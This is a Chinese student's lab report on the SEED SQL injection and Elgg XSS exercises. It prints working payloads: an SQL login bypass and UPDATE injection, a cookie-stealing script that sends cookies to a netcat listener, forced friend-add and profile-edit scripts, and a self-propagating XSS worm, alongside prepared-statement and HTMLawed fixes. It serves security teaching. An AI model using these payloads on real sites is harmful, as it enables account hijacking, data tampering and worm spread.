20232803 2023-2024-2 《网络攻防实践》实践十报告

目录

    • 1. 实践内容
      • 1.1 SEED SQL注入攻击与防御实验
      • 1.2 SEED XSS跨站脚本攻击实验(Elgg)
    • 2. 实践过程
      • 2.1 SEED SQL注入攻击与防御实验
        • 2.1.1 熟悉SQL语句
        • 2.1.2 对SELECT语句的SQL注入攻击
        • 2.1.3 对UPDATE语句的SQL注入攻击
        • 2.1.4 SQL对抗
      • 2.2 SEED XSS跨站脚本攻击实验(Elgg)
        • 2.2.1 发布恶意消息,显示警报窗口
        • 2.2.2 弹窗显示cookie信息
        • 2.2.3 窃取受害者的cookies
        • 2.2.4 成为受害者的朋友
        • 2.2.5 修改受害者的信息
        • 2.2.6 编写XSS蠕虫
        • 2.2.7 对抗XSS攻击
    • 3.学习中遇到的问题及解决
    • 4.实践总结

1. 实践内容

1.1 SEED SQL注入攻击与防御实验

  • 我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
  1. 熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

  2. 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

  3. 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

  4. SQL对抗:修复上述SQL注入攻击漏洞。

1.2 SEED XSS跨站脚本攻击实验(Elgg)

  • 为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
  1. 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

  2. 弹窗显示cookie信息:将cookie信息显示。

  3. 窃取受害者的cookies:将cookie发送给攻击者。

  4. 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

  5. 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

  6. 编写XSS蠕虫。

  7. 对抗XSS攻击。

2. 实践过程

  • 本次实验使用的虚拟机是SEEDUbuntu-16.04,参考Ubuntu系统修改用户名和主机名修改主机名
    在这里插入图片描述

2.1 SEED SQL注入攻击与防御实验

2.1.1 熟悉SQL语句
  • 输入命令mysql -u root -p登录数据库,密码为seedubuntu
    在这里插入图片描述

  • 先输入命令use Users;使用数据库Users,再输入show tables;查看该数据库的表
    在这里插入图片描述
    可以看到该数据库含有两张表,分别是Tables_in_Userscredential

  • 输入命令select * from Tables_in_Users;查看Tables_in_Users表中的字段和数据

  • 输入命令select * from credential; 查看credential表中的字段和数据
    在这里插入图片描述
    查看Tables_in_Users表时,提示该表不存在
    credential表中可以看到该表中含有姓名、生日、工资、密码等字段,并且有6条数据

2.1.2 对SELECT语句的SQL注入攻击
  • 自带的火狐浏览器中打开http://www.seedlabsqlinjection.com/
    在这里插入图片描述

  • 在该页面右键选择Inspect Element打开开发者工具,然后选择Network选项
    在这里插入图片描述

  • 输入任意的账号和密码,点击登录
    在这里插入图片描述
    可以看到,点击登录按钮后,该网站将用户输入的账号和密码作为路径参数,向unsafe_home.php页面发送了一个GET请求

  • 在终端中输入命令vim /var/www/SQLInjection/unsafe_home.php查看unsafe_home.php的源码

    • 首先从GET请求中获取账号和密码,并对密码进行哈希,然后检查是否存在已经登录的Session,接着与本地的数据库Users建立连接
      在这里插入图片描述
    • 建立连接后,使用SELECT语句根据账号和哈希后的密码查询用户的信息
      在这里插入图片描述
    • 接着我们可以发现管理员的账号为Admin
      在这里插入图片描述
  • 在实施SQL注入攻击之前,我们先对这条SELECT语句进行分析

SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password
FROM credential 
WHERE name= '$input_uname' and Password='$hashed_pwd';

这条语句的关键之处在于WHERE之后的条件判断
我们知道在SQL中#表示注释,如果我们在输入账号后紧接着输入一个单引号'将筛选条件终止,然后输入一个#将后面的SQL语句直接注释掉,那么这条SQL语句就能够直接被执行

  • 前面我们知道了管理员的账号是Admin,根据上述分析,我们在该网站中输入账号Admin'#进行登录,不需要输入密码
    在这里插入图片描述
  • 点击登录按钮后可以看到成功登录,进入了管理员页面,能够看到所有用户的信息
    在这里插入图片描述
    SELECT语句的SQL注入攻击成功!
2.1.3 对UPDATE语句的SQL注入攻击
  • 刚才已成功登录Admin的账号,接着点击页面上方的Edit Profile
    在这里插入图片描述
  • 打开开发者工具,输入新的用户信息
    在这里插入图片描述
  • 点击保存按钮后,可以看到该网站向unsafe_edit_backend.php页面发送了一个GET请求
    在这里插入图片描述
  • 在终端中输入命令vim /var/www/SQLInjection/unsafe_edit_backend.php查看unsafe_edit_backend.php文件的源码
    在这里插入图片描述
    可以看到这里有两条UPDATE语句,这两条是类似的,区别在于一个设置了新密码,而另一个没有设置新密码。这两条语句的区别对于我们实施SQL注入没有太大影响。
UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;

与前一个SQL注入类似,这里我们可以在SET nickname = '后面添加自己想要修改的字段,并通过WHERE name = 'xxx'来指定用户,最后使用#将后面的SQL语句注释掉

  • Edit Profile页面的NickName中输入wujinlong', SSN='20232803' where name='Alice';#,点击保存
    在这里插入图片描述
  • 可以看到修改成功,用户Alice的信息成功被修改
    在这里插入图片描述
    UPDATE语句的SQL注入攻击成功!
2.1.4 SQL对抗
  • 该网站存在SQL注入漏洞的原因是代码和用户输入的数据没有隔离,而是写在了一起,导致无法区分原始SQL语句和用户输入的数据,让攻击者有机可乘
  • SELECT语句修改如下
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

在这里插入图片描述

  • 再次尝试登录
    在这里插入图片描述
  • 登录失败
    在这里插入图片描述
    修复成功
  • UPDATE语句修改如下
# 第一条UPDATE语句
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address,$input_password, $input_phonenumber);
# 第二条UPDATE语句
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

在这里插入图片描述

  • 再次尝试修改,之前对Alice的信息进行了修改,这次尝试修改Boby的信息
    在这里插入图片描述

  • 点击保存后,查看信息发现修改失败
    在这里插入图片描述

修复成功!

2.2 SEED XSS跨站脚本攻击实验(Elgg)

2.2.1 发布恶意消息,显示警报窗口
  • 打开网站http://www.xsslabelgg.com/ ,该网站的用户名即为上一节的数据库中存在的用户名。除管理员Admin以外,用户的登录密码均为seed + 用户名
  • 下面我们使用Alice登录,如上所述,密码为seedalice
    在这里插入图片描述
  • 点击Alice的头像,然后点击Edit profile进入修改个人信息页面
    在这里插入图片描述
  • Brief description中输入XSS攻击代码<script> alert('xss');</script>,该代码用于弹出一个窗口
    在这里插入图片描述
  • 保存之后,再次访问Alice的主页,弹出了警报窗口
    在这里插入图片描述
2.2.2 弹窗显示cookie信息
  • Brief description中输入XSS攻击代码<script> alert(document.cookie);</script>,该代码用于弹出一个窗口,窗口中显示Cookie信息
    在这里插入图片描述
  • 保存之后,再次访问Alice的主页,弹出了警报窗口,显示了Cookie信息
    在这里插入图片描述
2.2.3 窃取受害者的cookies
  • 在页面加载时,如果遇到img标签,浏览器会向src字段指示的url发送请求。利用这一特性,我们便可以构造出如下代码,并将其写入Boby的Brief description中。
  • 当有用户访问Boby的主页时,该用户的cookie会被写到src字段中。通过document.write向页面写入了一个img标签,浏览器会把它当作是一张图片,向相应的地址和端口发送请求,请求中正携带了该用户的cookie信息
<script>document.write('<img src=http://127.0.0.1:2803?c=' + escape(document.cookie) + '>');
</script>

在这里插入图片描述

  • 在终端中输入命令nc -l 2803 -v监听端口
    在这里插入图片描述

  • 以Alice的身份登录,访问Boby的主页http://www.xsslabelgg.com/profile/boby
    在这里插入图片描述
    成功监听到这一请求,并且获取了受害者Alice的Cookie

2.2.4 成为受害者的朋友
  • 以Alice的身份登录,访问Boby的主页http://www.xsslabelgg.com/profile/boby,右键选择Inspect Element打开开发者工具,选择Network

  • 点击左侧的Add friend按钮向Boby发送好友请求
    在这里插入图片描述

  • 点击Add friend按钮后,向http://www.xsslabelgg.com/action/friends/add发送了POST请求,并携带了三个参数

friend=45 //要添加的用户id
__elgg_ts=1715849723 //时间戳
__elgg_token=8s6rxvluUUz-8kY8-VbeoQ //token
  • 于是构造如下js代码,用于强制添加好友
<script type="text/javascript">window.onload = function () {var Ajax = null;var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;var token = "&__elgg_token=" + elgg.security.token.__elgg_token;var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script>
  • 打开Alice的Edit profile页面,点击About me右侧的Edit HTML,填写以上代码并保存
    在这里插入图片描述

  • 以Boby的身份登录,访问Alice的主页http://www.xsslabelgg.com/profile/alice,再回到Boby的主页
    在这里插入图片描述
    可以看到Boby自动将Alice添加为好友了

2.2.5 修改受害者的信息
  • 与上一节相似,在Alice的Edit profile页面打开开发者工具的Network,点击保存按钮发送修改个人信息的请求
    在这里插入图片描述

根据请求结果可知,修改个人信息时,向http://www.xsslabelgg.com/action/profile/edit发送了POST请求,并携带了多个字段信息

  • 于是构造如下js代码,用于强制修改用户个人信息
<script type="text/javascript">window.onload = function(){var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;var content= token + ts + "name=" + userName + "&description=<p>Edited By 20232803wjl</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"var aliceGuid=44;if(elgg.session.user.guid!=aliceGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}
</script>
  • 打开Alice的Edit profile页面,点击About me右侧的Edit HTML,填写以上代码并保存
    在这里插入图片描述

  • 以Boby的身份登录,访问Alice的主页http://www.xsslabelgg.com/profile/alice,再回到Boby的主页
    在这里插入图片描述
    Boby的个人信息成功被修改

2.2.6 编写XSS蠕虫
  • 编写如下XSS蠕虫代码
<script id="worm" type="text/javascript">window.onload = function(){var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";var jsCode = document.getElementById("worm").innerHTML;var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;//Construct the content of your url.var content= token + ts + "&name=" + userName + "&description=<p>XSS Attack By 20232803wjl"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"alert(content)var aliceGuid=44;if(elgg.session.user.guid!=aliceGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}
</script>
  • 打开Alice的Edit profile页面,点击About me右侧的Edit HTML,填写以上代码并保存
  • 以Boby的身份登录,访问Alice的主页后,再返回Boby的主页,此时发现Boby的个人信息已被修改
    在这里插入图片描述
  • 以Samy的身份登录,访问Boby的主页,再返回Samy的主页,此时发现Samy的个人信息也被修改了
    在这里插入图片描述
    由此可知,XSS蠕虫攻击成功!
2.2.7 对抗XSS攻击
  • 以管理员Admin的身份进行登录,用户名为Admin,密码为seedelgg
  • 登录后,依次点击右上角的Account - Administration
    在这里插入图片描述
  • 点击页面右侧的Plugins
    在这里插入图片描述
  • 找到HTMLawed,发现该插件已被激活,不需要再进行操作,该插件用于提供安全校验

注:显示Deactivate就表示已经激活了!!
如果是显示Activate,才需要点击Activate将其切换为Deactivate状态以激活该插件

  • 再次以Samy的身份,访问Alice的主页
    在这里插入图片描述
    可以看到Alice主页里的XSS蠕虫代码已失效,对抗成功!

3.学习中遇到的问题及解决

  • 问题1:在对抗XSS攻击实践中,激活了插件HTMLawed,但XSS攻击仍成功,也就是对抗失败了
  • 解决方案:
    • 经过检查,发现在Plugins插件页面中,插件左侧的按钮若显示Activate则表示插件未激活,若显示Deactivate则表示插件已激活
    • 于是重新激活插件,成功对抗XSS攻击

4.实践总结

对于SQL注入和XSS攻击,以前只是了解但还未实践过,这一次的实践让我对它们有了直观的感受。SQL注入漏洞让用户可以随意的操作数据库进行增删改查,XSS蠕虫更是能够自我传播。这两个漏洞都是因为没有对用户输入的数据进行校验导致的,因此在开发阶段就应注意这些安全隐患。好在现如今许多开发框架都已替我们考虑到了这些安全漏洞,现在很少有网站存在SQL注入漏洞和XSS漏洞了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/329541.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Elasticsearch的Index sorting 索引预排序会导致索引数据的移动吗?

索引预排序可以确保索引数据按照指定字段的指定顺序进行存储&#xff0c;这样在查询的时候&#xff0c;如果固定使用这个字段进行排序就可以加快查询效率。 我们知道数据写入的过程中&#xff0c;如果需要确保数据有序&#xff0c;可能需要在原数据的基础上插入新的数据&#…

[机缘参悟-185] - 《道家-水木然人间清醒1》读书笔记 - 真相本质 -8- 认知觉醒 - 逻辑谬误、认知偏差:幸存者偏差

目录 前言&#xff1a; 一、幸存者偏差 二、幸存者偏差在现实中的应用 第一个故事&#xff1a; 第二个故事&#xff1a; 三、生活中的幸存者偏差 四、迷恋成功者经验的原因&#xff1a;鸡汤、幻想、传奇、希望 备注&#xff1a; 前言&#xff1a; 幸存者偏差&#xff0…

Java 多线程抢红包

问题需求 一个人在群里发了1个100元的红包&#xff0c;被分成了8个&#xff0c;群里有10个人一起来抢红包&#xff0c;有抢到的金额随机分配。 红包功能需要满足哪些具体规则呢? 1、被分的人数抢到的金额之和要等于红包金额&#xff0c;不能多也不能少。 2、每个人至少抢到1元…

免费发布web APP的四个途径(Python和R)

免费发布数据分析类&#x1f310;web APP的几个途径&#x1f4f1; 数据分析类web APP目前用来部署生信工具&#xff0c;统计工具和预测模型等&#xff0c;便利快捷&#xff0c;深受大家喜爱。而一个免费的APP部署途径&#xff0c;对于开发和测试APP都是必要的。根据笔者的经验…

java面试(多线程)

线程和进程的区别 程序由指令和数据组成&#xff0c;但这些指令要运行&#xff0c;数据要读写&#xff0c;就必须将指令加载至CPU&#xff0c;数据加载至内存。在指令运行过程中还需要用到磁盘&#xff0c;网络等设备。进程就是用来加载指令&#xff0c;管理内存&#xff0c;管…

Android11热点启动和关闭

Android官方关于Wi-Fi Hotspot (Soft AP) 的文章&#xff1a;https://source.android.com/docs/core/connect/wifi-softap?hlzh-cn 在 Android 11 的WifiManager类中有一套系统 API 可以控制热点的开和关&#xff0c;代码如下&#xff1a; 开启热点&#xff1a; val builde…

基于IP子网vlan划分

在某些场景中&#xff0c;客户的终端地址都是固定的&#xff0c;并且有移动的需求&#xff0c;也就是接口不固定&#xff0c;这时候基于接口的VLAN就不合适了&#xff0c;因为通常情况下一个VLAN属于一个网段&#xff0c;对于这种接口之间任意插还能保证业务不受影响的&#xf…

记录centos中操作(查找、结束、批量)进程以及crontab定时写法的知识

环境&#xff1a;vps&#xff0c;centos7&#xff0c;python3。 近期写了个python程序&#xff0c;用青龙面板在centos上运行。程序中有while无限循环&#xff0c;但是我在青龙中设置了定时任务&#xff08;每隔半小时运行一次&#xff09;&#xff0c;于是造成了进程中有多个…

分布式文件系统minIo

分布式文件系统 什么是分布式文件系统 一个计算机无法存储海量的文件&#xff0c;通过网络将若干计算机组织起来共同去存储海量的文件&#xff0c;去接收海量用户的请求&#xff0c;这些组织起来的计算机通过网络进行通信&#xff0c;如下图&#xff1a; 好处&#xff1a; 1、…

Wpf 使用 Prism 实战开发Day22

客户端添加IDialogService 弹窗服务 在首页点击添加备忘录或待办事项按钮的时候&#xff0c;希望有一个弹窗&#xff0c;进行相对应的内容添加操作。 一.在Views文件夹中&#xff0c;再创建一个Dialog 文件夹&#xff0c;用于放置备忘录和待办事项的弹窗界面。 1.1 备忘录&…

js实现鼠标拖拽多选功能

实现功能 在PC端的H5页面中&#xff0c;客户拖动鼠标可以连选多个选项 效果展示 具体代码如下 <!DOCTYPE html> <html><head><title>鼠标拖拽多选功能</title><script src"https://cdn.bootcss.com/jquery/1.10.2/jquery.min.js&quo…

ZISUOJ 数据结构--图及其应用

说明 主要考察建图&#xff0c;图的遍历以及求最小生成树。都还是比较简单的&#xff0c;后面就直接上代码了。 最小生成树采用prim还是kruskal算法要看题目怎么给出数据&#xff0c;如果以邻接矩阵的形式给出&#xff0c;采用prim算法比较合适&#xff0c;如果以边和边的权重的…

docker三种自定义网络(虚拟网络) overlay实现原理

docker提供了三种自定义网络驱动&#xff1a;bridge、overlay、macvlan。 bridge驱动类似默认的bridge网络模式。 overlay和macvlan是用于创建跨主机网络。 支持自定义网段、网关&#xff0c;docker network create --subnet 172.77.0.0/24 --gateway 172.77.0.1 my_n…

浅谈JMeter测试计划

浅谈JMeter测试计划 创建测试计划 当启动JMeter后&#xff0c;默认进入界面会看到一个测试计划 测试计划组件详情 在上述界面中&#xff0c;我们可以看到测试计划的组成为名称、注释、用户定义的变量、独立运行每个线程组、主线程结束后运行tearDown线程组、函数测试模式以…

科技查新中查新点的怎样进行精确提炼?

根据2015年《科技查新技术规范》&#xff1a;科技查新简称查新&#xff0c;以反映查新项目主题内容的查新点为依据&#xff0c;以计算机检索为主要手段&#xff0c;以获取密切相关文献为检索目标&#xff0c;运用综合分析和对比方法&#xff0c;对查新项目的新颖性做出文献评价…

JMETER工具:以录制手机app为例

JMETER工具&#xff1a;以录制手机app为例子 JMETER安装和环境配置 pc需要安装jdk&#xff0c;并进行jdk的环境配置&#xff0c;安装好jdk并配置好后&#xff0c;通过命令行输入java –version出现以下界面就表示安装成功&#xff1a; &#xff08;对应的jdk版本不可太低&…

深度学习——图像分类(CNN)—训练模型

训练模型 1.导入必要的库2.定义超参数3.读取训练和测试标签CSV文件4.确保标签是字符串类型5.显示两个数据框的前几行以了解它们的结构6.定义图像处理参数7.创建图像数据生成器8.设置目录路径9.创建训练和验证数据生成器10.构建模型11.编译模型12.训练模型并收集历史13.绘制损失…

excel转pdf并且加水印,利用ByteArrayOutputStream内存流不产生中间文件

首先先引入包&#xff1a;加水印和excel转PDF的 <dependency><groupId>com.itextpdf</groupId><artifactId>itextpdf</artifactId><version>5.5.12</version></dependency><dependency><groupId>org.apache.poi&l…

jenkins插件之xunit

安装jenkins插件 搜索xunit并安装 项目配置 配置 - Build Steps 您的项目 - 配置 - Build Steps, 新增 Run with timeout 超时时间根据实际情况配置 Build Step选择 执行SHELL 填写一下命令&#xff0c;这个命令是docker中执行phpunit单元测试&#xff0c;请根据你的实际…

FPGA学习笔记之Nios II(一)简单介绍及新建工程及下载

系列文章目录 文章目录 系列文章目录前言QsysNios IIhello world 实例Platform DesignNios II程序设计 前言 利用Quartus中的Qsys工具&#xff0c;可以实现在FPGA里面跑嵌入式的功能 Qsys Altera 公司将主控制器、数字信号处理模块、存储器及其控制模块、各种接口协议等模块&…